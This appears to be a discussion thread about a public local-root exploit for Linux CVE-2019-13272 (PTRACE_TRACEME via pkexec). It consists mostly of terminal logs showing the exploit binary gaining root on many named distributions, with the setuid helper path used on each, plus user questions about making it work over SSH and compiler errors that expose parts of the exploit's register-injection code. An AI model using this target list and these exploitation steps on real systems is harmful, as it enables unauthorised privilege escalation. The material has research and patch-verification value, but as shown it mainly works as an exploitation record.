/usr/lib/gnome-settings-daemon/gsd-backlight-helper
user@debian-10-0-0-x64:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
root@debian-10-0-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(user)
root@debian-10-0-0-x64:/home/user/Desktop/47133#
/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper
user@debian9-4-0-x64:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
root@debian9-4-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(lpadmin),117(scanner),1000(user)
/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper
user@devuan-2-0-0:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
root@devuan-2-0-0:/home/user/Desktop/47133#
/usr/bin/lxqt-backlight_backend
user@sparkylinux-5-x64:~/47133$ ./a.out
executing passwd
attached to midpid
root@sparkylinux-5-x64:/home/user/47133# id
uid=0(root) gid=0(root) groups=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(user)
root@sparkylinux-5-x64:/home/user/47133#
/usr/lib/unity-settings-daemon/usd-backlight-helper
user@ubuntu-16-04-5-x64:~/Desktop/kernel-exploits/CVE-2019-13272$ ./a.out
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[~] Using helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@ubuntu-16-04-5-x64:/home/user/Desktop/kernel-exploits/CVE-2019-13272#
/usr/lib/gnome-settings-daemon/gsd-backlight-helper
user@ubuntu:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@ubuntu:/home/user/Desktop/47133#
/usr/lib/gnome-settings-daemon/gsd-backlight-helper
user@ubuntu-19-04-x64:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@ubuntu-19-04-x64:/home/user/Desktop/47133#
/usr/sbin/mate-power-backlight-helper
user@ubuntu-mate-19-04-desktop-amd64:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@ubuntu-mate-19-04-desktop-amd64:/home/user/Desktop/47133#
/usr/sbin/mate-power-backlight-helper
user@linux-mint-19-2:~/Desktop/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@linux-mint-19-2:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
root@linux-mint-19-2:/home/user/Desktop/47133#
/usr/lib/gnome-settings-daemon/gsd-backlight-helper
user@elementary-os-0-4-1-20170517:~/47133$ ./a.out
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@elementary-os-0-4-1-20170517:/home/user/47133# exit
/usr/libexec/gsd-wacom-led-helper
/usr/libexec/gsd-wacom-oled-helper
[user@localhost CVE-2019-13272]$ ./a.out
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/libexec/gsd-wacom-led-helper
[.] Spawning pkexec ...
[.] Tracing midpid ...
[~] Attached to midpid
[root@localhost CVE-2019-13272]# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
/usr/bin/xfpm-power-backlight-helper
[user@manjaro-xfce-18-0-3-x86-64 47133]$ ./a.out
executing passwd
attached to midpid
[manjaro-xfce-18-0-3-x86-64 47133]#
/usr/libexec/gsd-backlight-helper
[user@localhost 47133]$ ./a.out
executing passwd
attached to midpid
[root@localhost 47133]#
Antergos recently reached EOL (last release 2019-04-04)
/usr/lib/gsd-wacom-oled-helper
/usr/lib/gsd-backlight-helper
[user@antergos 47133]$ ./a.out
executing passwd
attached to midpid
[root@antergos 47133]# id
uid=0(root) gid=0(root) groups=0(root),985(users),998(wheel)
[root@antergos 47133]# exit
Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro? I tried this briefly and unsuccessfully on Ubuntu 18.04
Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro? I tried this briefly and unsuccessfully on Ubuntu 18.04
Yes, I'll implement automatic targeting.
I downloaded the PoC without modifications and it reboots my device (Android Pie). Any idea whether Android is vulnerable, and if not, why?
FYI, it works for me on Ubuntu 18.04 as a logged-in user, but not over SSH:
ssh user@vulnerable
user@ubuntu:~$ ./a.out
executing passwd
Error executing command as another user: Not authorized
This incident has been reported.
(I'm already logged in as the same user)
fyi it works for me on ubuntu 18.04 as a logged in user, but not over ssh:
Correct. Console lock is not sufficient for pkexec. Need an active pkexec session.
Updated C exploit here:
Was anyone able to make it work over SSH? PoC?
Are there any other binaries that meet the requirements, like pkexec helpers, which do not require an active pkexec session, so that it would work over SSH?
Updated C exploit here:
Cannot compile on aarch64
What's the error? What's the OS?
What's the error? What's the OS?
CVE-2019-13272.c:181:24: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
execl(pkexec_path, basename(pkexec_path), NULL);
^
CVE-2019-13272.c:181:24: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
execl(pkexec_path, basename(pkexec_path), NULL);
^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
^
CVE-2019-13272.c:198:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
^
CVE-2019-13272.c:198:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
^
CVE-2019-13272.c:215:38: error: no member named 'rsp' in 'struct user_regs_struct'; did you mean 'sp'?
unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
^~~
sp
/data/data/com.termux/files/usr/include/sys/user.h:242:12: note: 'sp' declared here
uint64_t sp;
^
CVE-2019-13272.c:233:8: error: no member named 'orig_rax' in 'struct user_regs_struct'
regs.orig_rax = __NR_execveat;
~~~~ ^
CVE-2019-13272.c:234:8: error: no member named 'rdi' in 'struct user_regs_struct'
regs.rdi = exec_fd;
~~~~ ^
CVE-2019-13272.c:235:8: error: no member named 'rsi' in 'struct user_regs_struct'
regs.rsi = scratch_area + offsetof(struct injected_page, path);
~~~~ ^
CVE-2019-13272.c:236:8: error: no member named 'rdx' in 'struct user_regs_struct'
regs.rdx = scratch_area + offsetof(struct injected_page, argv);
~~~~ ^
CVE-2019-13272.c:237:8: error: no member named 'r10' in 'struct user_regs_struct'
regs.r10 = scratch_area + offsetof(struct injected_page, envv);
~~~~ ^
CVE-2019-13272.c:238:8: error: no member named 'r8' in 'struct user_regs_struct'
regs.r8 = AT_EMPTY_PATH;
~~~~ ^
CVE-2019-13272.c:258:17: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
execlp(SHELL, basename(SHELL), NULL);
^
CVE-2019-13272.c:258:17: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
execlp(SHELL, basename(SHELL), NULL);
^~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:105:44: note: passing argument to parameter '__arg0' here
int execlp(const char* __file, const char* __arg0, ...) __attribute__((__sentinel__));
^
CVE-2019-13272.c:406:6: warning: implicit declaration of function 'strchrnul' is invalid in C99 [-Wimplicit-function-declaration]
*strchrnul(buf, '\n') = '\0';
^
CVE-2019-13272.c:406:5: error: indirection requires pointer operand ('int' invalid)
*strchrnul(buf, '\n') = '\0';
^~~~~~~~~~~~~~~~~~~~~
CVE-2019-13272.c:407:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
if (strncmp(buf, basename(helper_path), 15) == 0)
^
CVE-2019-13272.c:407:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
if (strncmp(buf, basename(helper_path), 15) == 0)
^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/string.h:137:44: note: passing argument to parameter '__rhs' here
int strncmp(const char* __lhs, const char* __rhs, size_t __n) __attribute_pure__;
^
9 warnings and 8 errors generated.
What's the error? What's the OS?
Android Pie with Linux kernel 4.9.106, using the Termux terminal environment. gcc: clang-8
This exploit doesn't work on Android